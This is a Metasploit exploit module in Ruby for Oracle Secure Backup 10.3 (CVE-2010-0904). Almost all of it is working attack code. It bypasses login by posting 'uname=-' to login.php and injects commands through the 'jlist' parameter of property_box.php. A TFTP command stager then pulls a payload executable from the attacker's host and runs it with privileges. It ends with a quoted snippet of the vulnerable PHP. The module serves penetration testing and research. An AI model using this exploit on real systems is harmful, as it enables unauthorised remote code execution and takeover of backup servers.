Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability',
      'Description'    => %q{
          This module exploits an authentication bypass vulnerability
        in login.php. In conjunction with the authentication bypass issue,
        the 'jlist' parameter in property_box.php can be used to execute
        arbitrary system commands.
        This module was tested against Oracle Secure Backup version 10.3.0.1.0
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2010-0904' ],
          [ 'OSVDB', '66338' ],
          [ 'ZDI', '10-118' ]
          # the jlist vector has not been disclosed or has it?
        ],
      'Targets'	=>
        [
          [ 'Windows Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win'
            }
          ]
        ],
      'CmdStagerFlavor' => 'tftp',
      'Privileged' => true,
      'Platform' => 'win',
      'DisclosureDate' => '2010-07-13',
      'DefaultTarget' => 0))

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL',   [true, 'Use SSL', true]),
        OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
      ])
  end

  def windows_stager
    print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
    execute_cmdstager({ temp: '.', tftphost: tftphost })
    @payload_exe = generate_payload_exe

    print_status("Attempting to execute the payload...")
    execute_command(@payload_exe)
  end

  def execute_command(cmd, opts = {})

    res = send_request_cgi(
      {
        'uri'   =>  '/login.php',
        'data'  =>  'attempt=1&uname=-',
        'method' => 'POST',
      }, 5)

    if res.get_cookies.match(/PHPSESSID=(.*);(.*)/i)
      sessionid = res.get_cookies

      data = '?type=Job&jlist=0%26' + Rex::Text::uri_encode(cmd)

      send_request_raw(
        {
          'uri'   => '/property_box.php' + data,
          'cookie' => sessionid,
          'method' => 'GET',
        }, 5)

    else
      print_error("Invalid PHPSESSION token..")
      return
    end
  end

  def exploit

    unless datastore['CMD'].blank?
      print_status("Executing command '#{datastore['CMD']}'")
      execute_command(datastore['CMD'])
      return
    end

    case target['Platform']
      when 'win'
        windows_stager
      else
        fail_with(Failure::Unknown, 'Target not supported.')
    end

    handler

  end
end

__END__
  else if (strcmp($type, "Job") == 0)
    {
    if (!is_array($objectname))
      $objectname = array();
    reset($objectname);
    while (list(,$oname) = each($objectname))
      {
      $oname = escapeshellarg($oname);
      $jlist = "$jlist $oname";
      }
    if (strlen($jlist) > 0)
      $msg = exec_qr("$rbtool lsjob -lrRLC $jlist");